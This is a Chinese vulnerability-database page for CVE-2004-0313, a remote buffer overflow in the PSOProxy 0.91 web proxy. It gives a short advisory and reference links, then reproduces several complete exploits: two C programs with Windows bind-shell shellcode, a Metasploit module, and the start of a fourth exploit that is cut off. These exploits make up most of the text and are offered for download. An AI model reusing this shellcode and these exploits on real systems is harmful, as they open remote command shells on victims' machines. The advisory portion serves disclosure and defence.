CVE-2004-0313
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:43:38
NMCOEPS    

[原文]Buffer overflow in PSOProxy 0.91 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP request, as demonstrated using a long (1) GET argument or (2) method name.


[CNNVD]PSOProxy远程缓冲区溢出漏洞(CNNVD-200411-140)

        
        PSOProxy是设计结合Gamecube web浏览器工作的WEB服务应用程序。
        PSOProxy对GET请求缺少正确边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,可能以进程权限在系统上执行任意指令。
        由于服务器没有很充分的对超长GET HTTP请求进行检查,提交包含超长字符串数据可触发缓冲区溢出,精心构建提交数据可以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0313
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0313
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-140
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107730731900261&w=2
(UNKNOWN)  BUGTRAQ  20040220 Remote Buffer Overflow in PSOProxy 0.91
http://www.securityfocus.com/bid/9706
(VENDOR_ADVISORY)  BID  9706
http://xforce.iss.net/xforce/xfdb/15275
(VENDOR_ADVISORY)  XF  psoproxy-long-get-bo(15275)

- 漏洞信息

PSOProxy远程缓冲区溢出漏洞
危急 边界条件错误
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        PSOProxy是设计结合Gamecube web浏览器工作的WEB服务应用程序。
        PSOProxy对GET请求缺少正确边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,可能以进程权限在系统上执行任意指令。
        由于服务器没有很充分的对超长GET HTTP请求进行检查,提交包含超长字符串数据可触发缓冲区溢出,精心构建提交数据可以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        PSOProxy
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://psoproxy.sourceforge.net/

- 漏洞信息 (156)

PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP) (EDBID:156)
windows remote
2004-02-26 Verified
8080 Rave
[点击下载] [点击下载]
/*

	 Copyright © Rosiello Security

 	      http www rosiello org
 	    ================

 -== Remote Exploit for PSOProxy version v0.91 ==--
 Code by: rave
 Contact: rave@rosiello.org
 Date: Feb 2004
 Bug found by: Donato Ferrante

 There is a vulnerability found in the PSOProxy server.
 An attacker can execute arbitrary code exploiting remotely a buffer overflow.

	The exploit sends:

    GET / <1021 x A><adres of the shellcode><shellcode>

 This spawns a bindshell on the victim at port 28876..


 Usage <C:\>psoproxy-exploit.exe <target host> <target number>
 Target Number           Target Name                             Stack Adress
 =============           ===========                             ===========
 0                       Demo                                    0xBADC0DED
 1                       Windows XP Home Edtion SP1.             0x00D2FDDA
 2                       Windows XP Pro Edtion SP1.              0x00EDFDDC
 3                       Win2k Pro Edtion.                       0x00BBFDDC



 <C:\> psoproxy-exploit localhost 1
 [+] Winsock Inalized
 [+] Trying to connect to localhost:8080
 [+] socket inalized
 [+] Overflowing string is Prepared
 [+] Connected.
 [+] Overflowing string had been send


 <C:\> telnet localhost 28876
 Microsoft Windows XP [versie 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 <D:\>

 DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
 Respect the law as we do!




   Special Tankz to:
   opy   { win2k 0wnage !! ty for lending me ur box }
   B0f   { Hope to work with u again in the futhure like we do all the time }
   Dragnet  { Always willing to help me out }
   Angelo  { Verry good maffio`so }


   Greetz go out to:
   Kajun  { Verry suportive guy }
   NrAziz { 0wns pakistan hax0r scene ! beware always say mr NrAziz }
   sloth  { good guy }
   Mercy  { Hope to see u soon }
   Netric security {www.netric.org/.de }
   [+] All the hax0rs i forgot.

   Hate Messages:
   Ziphie { U didnt get mine bitch }

  OOh and Li0n7 voila fr {
  you're doing it all wrong, your exploit doesn't work!
  http://www.securityfocus.com/archive/1/354769/2004-02-15/2004-02-21/0
  k/j man, keep on doing the good stuff and next time add some more stack adresses so
  it would work on other os`s...

  }



Advisory at: http://www.rosiello.org/en/read_bugs.php?15

*/


#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 1024 //1024





struct remote_targets {
  char *os;
  unsigned long sh_addr;
} target [] ={
/* Option`s for your eyes only :D*/
    "Demo                        ",
     0xbadc0ded,


    "Windows XP Home Edtion SP1. ",
     0x00D2FDDA,

    "Windows XP Pro Edtion SP1.  ",
     0x00edfddc,


    "Win2k Pro Edtion.          ",
     0x00bbfddc,

 };






//Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys)
unsigned char  shellcode[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89\x41";


// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
 struct  hostent    *hp;

 if (ISIP(hostname)) return inet_addr(hostname);

  if ((hp = gethostbyname(hostname))==NULL)
  { perror ("[+] gethostbyname() failed check the existance of the host.\n");
    exit(-1); }

  return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}


/// oooh yeah uuuh right ....
int usage (char *what)
{
 int i;
  fprintf(stdout,"Copyright © Rosiello Security\n");
  fprintf(stdout,"http://www.rosiello.org\n\n");
  fprintf(stdout,"Usage %s <target host> <target number>\n",what);
  fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
  fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

  for (i=0;i < 4;i++)
   fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);

  exit(0);
}

int main(int argc,char **argv)

{


char buffer[offset*2]="get /",*ptr,*address;
int sd,oops,i,choise;
struct  sockaddr_in  ooh;


WSADATA wsadata;
WSAStartup(0x101, &wsadata);

if (argc < 2) usage(argv[0]);
address=argv[1];
choise=atoi(argv[2]);

fprintf(stdout,"[+] Winsock Inalized\n");

 /* Lets start making a litle setup
    Change the port if you have to */

 ooh.sin_addr.s_addr = inet_addr(get_ip(address));
    ooh.sin_port        = htons(8080);
    ooh.sin_family      = AF_INET;


fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,8080);


// ok ok here`s ur sock()
sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
 if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

 fprintf(stdout,"[+] socket inalized\n");


 /* initializing the expploiting buffer, read the file comments for the details */
ptr=buffer+strlen(buffer);

for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x2e;
for (i=strlen(buffer);i < offset+6;i++) { *ptr++=(char)0xa; *ptr++=(char)0xd ;}

memcpy(buffer+strlen(buffer),((char *)&shellcode),strlen(shellcode));
memcpy(buffer+offset,((char *)&target[choise].sh_addr),3);


fprintf(stdout,"[+] Overflowing string is Prepared\n");

 // Knock knock ... hi i want to hook up with you
 oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
  if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

// yep we are in :D
fprintf(stdout,"[+] Connected.\n");


// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

fprintf(stdout,"[+] Overflowing string had been send\n");


/* May psoproxy rest in peace (have cold a nice one and telnet to <host>  28876

 <C:\> telnet localhost 28876
 Microsoft Windows XP [versie 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 D:\>
*/


// the cleaners !!
WSACleanup();

// [EOF]
return 0;

}

// milw0rm.com [2004-02-26]
		

- 漏洞信息 (16790)

PSO Proxy v0.91 Stack Buffer Overflow (EDBID:16790)
windows dos
2010-05-09 Verified
8080 metasploit
[点击下载] [点击下载]
##
# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PSO Proxy v0.91 Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
				If a client sends an excessively long string the stack is overwritten.
			},
			'Author'         => 'Patrick Webster <patrick@aushack.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-0313' ],
					[ 'OSVDB', '4028' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
					[ 'BID', '9706' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 20 2004'
			))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		if (banner =~ /PSO Proxy 0\.9/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		exploit = rand_text_alphanumeric(1024, payload_badchars)
		exploit += [target['Ret']].pack('V') + payload.encoded

		sock.put(exploit + "\r\n\r\n")

		disconnect
		handler
	end
end

		

- 漏洞信息 (23732)

PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1) (EDBID:23732)
windows remote
2004-02-20 Verified
0 PaLbOsA
N/A [点击下载]
source: http://www.securityfocus.com/bid/9706/info

It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. 

/*
**  Voici mon 1er exploit, il traite d'une faille dans le programme PSOProxy v0.91
**  Il s'agit d'un buffer overflow type et facile a faire (c pour <E7>a que j'ai r<E9>ussi ^^)
**
**  Pour des infos tecniques aller ici : http://seclists.org/lists/bugtraq/2004/Feb/0567.html
**
**  Sinon l'exploit consiste en : 1. on ce connecte au pc distnant
**                                2. on envoit le code malicieux
**                                                                3. un shell souvre sur le port 4444
**  Teste sous xp sp1.
**
**
**  Merci a Vendame qui m'as d<E9>bloqu<E9> et a CRPT.
**
**      Merci aussi a ceux qui font pas chier et qui se prenne pas pour dieux.
**
**      ps : prochaine version bientot disponible.
**  ps2 : j'ai bien comment<E9> le code pour que ceux qui veulent apprendre apprennent
**  ps3 : Je ne cherche qu'<E0> m'am<E9>lior<E9>, alors si vous avez des sugestions, des modifications,
**        je suis la pour les recevoir :).
**
**                     Coded By PaLbOsA
*/







#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib, "ws2_32.lib")
void intro(){
           printf("***************************************************\n");
           printf("*  PSOProxy v0.91 Exploit                         *\n");
           printf("*                            Coded By PaLbOsA     *\n");
           printf("*                                                 *\n");
           printf("* C mon premier exploit, alors soyez indulgent :) *\n");
           printf("*                                                 *\n");
           printf("*    Un grand Merci a vendame et a CRPT.          *\n");
           printf("***************************************************\n");
}

void main(int argc, char *argv[])
{

char buffer[3000]; // on prend un bon gros buffer :>

char ip[30]; // a ton avis?

char shellcode[]= // Ouvre le port 4444 en <E9>coute
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";


WSADATA WSAData; // On initialise une variable du type WSDATA
SOCKET sock; // on initialise une variable de type sock --> le socket :)
SOCKADDR_IN sinf; // variable qui contien les infos teckniques du socket

system("cls"); // on efface l'<E9>cran pour faire joli
intro();

if(argc!=3) {
printf("\nUsage : %s <ip> <port>\n",argv[0]);
exit(-1);
}


_snprintf(ip, 24, "%s", argv[1]);


WSAStartup(MAKEWORD(2,0), &WSAData); // on startup :-)
sinf.sin_addr.s_addr    = inet_addr(ip);                         //  IP :)
sinf.sin_family         = AF_INET;                       // "Famille du socket"
sinf.sin_port           = htons(atoi(argv[2]));          //  PORT ! oooooh :>
sock = socket(AF_INET,SOCK_STREAM,0);                //  Cr<E9>ation du socket en temps que tel

bind(sock, (SOCKADDR *)&sinf, sizeof(sinf));         // On attache le socket a l'adresse et le port qu'on a d<E9>fini
connect(sock, (SOCKADDR *)&sinf, sizeof(sinf));

sprintf(buffer,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA\x0F\x98\xF8\x77%s\r\n",shellcode);// 77F8980F \x0F\x98\xF8\x77

send(sock,buffer,3000,0);
printf("  Exploit envoye... tester le port 4444\n\n");
closesocket(sock);
WSACleanup();

}

		

- 漏洞信息 (23733)

PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2) (EDBID:23733)
windows remote
2004-02-20 Verified
0 Li0n7
N/A [点击下载]
source: http://www.securityfocus.com/bid/9706/info
 
It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.
 
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. 

/*
 * PSOProxy remote stack-based overflow
 * by Li0n7@voila.fr
 * Bug found by Donato Ferrante <fdonato@autistici.org>
 * Spawns cmd.exe on port 9191
 *
 * usage: ./PSOProxy-exp -h <victim> -p <port> -t <target>
 * Platforms supported are:
 *     0 - XP SP1 FR - PSOProxy 0.91 - 0x77d615b9
 *
 * $./PSOProxy-exp -h 192.168.0.1 -p 8080 -t 0
 * PSOProxy <= 0.91 remote exploit
 * Bug found by Donato Ferrante <fdonato@autistici.org>
 * Exploit written by Li0n7 <Li0n7@voila.fr>
 *
 * [+] Connected to 192.168.0.1:8080.
 * [+] Building evil string to send (0x77d615b9).
 * [+] Here's your shell, have fun!
 * Microsoft Windows XP [version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:\Program Files\psoproxy-x86-win32-0.91>
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>

#define BACK         9191
#define D_PORT       8080
#define SIZE         2048
#define JMP_ESP      0x77D4643D // USER32.DLL JMP ESP addr

//ripped shellcode from ?

char shellcode[] =
 "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
  "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
  "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
  "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
  "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
  "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
  "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
  "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
  "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
  "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
  "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
  "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
  "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
  "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
  "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
  "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
  "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
  "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
  "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
  "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
  "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
  "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
  "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
  "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
  "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
  "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
  "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
  "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
  "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
  "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
  "\xD3\x4A\x8C\x88";

struct os_ret_addr
{
      int num;
      char *plat;
      long ret;
};

struct os_ret_addr exp_os[]=
{
{0,"XP SP1 FR - PSOProxy 0.91", 0x77D615B9}, // USER32.DLL jmp esp addr
{0,NULL,0},
};

char *build(long ret);
int back_connection(long host);
void send_evil(int fd,char evil[]);
int set_connection(long host,int port);
long resolve_host(u_char *host_name);
void die(char *argv);

int
main(int argc,char *argv[])
{
      int i, option, fd, port = D_PORT;
      long host = 0, ret = JMP_ESP;
      char * option_list = "h:p:t:", buffer[SIZE];

      opterr = 0;

      fprintf(stdout,"PSOProxy <= 0.91 remote exploit\r\n");
      fprintf(stdout,"Bug found by Donato Ferrante <fdonato@autistici.org>\r\n");
      fprintf(stdout,"Exploit written by Li0n7 <Li0n7@voila.fr>\r\n\n");

      if (argc < 2) die(argv[0]);

      while((option = getopt(argc,argv,option_list)) != -1)
          switch(option)
          {
              case 'h':
                  host = resolve_host(optarg);
                  if(!host)
                  {
                      fprintf(stderr,"[-] Host address incorrect.\n");
                      exit(0);
                  }
                  break;
              case 'p':
                  port = atoi(optarg);
                  if(port > 65535 || port < 0) exit(1);
                  break;
              case 't':
                  for(i=0; exp_os[i].plat != NULL; i++)
                  if(atoi(optarg) > i || atoi(optarg) < 0)
                  {
                      fprintf(stderr,"Platforms supported are:\n");
                      for(i=0; exp_os[i].plat != NULL; i++)
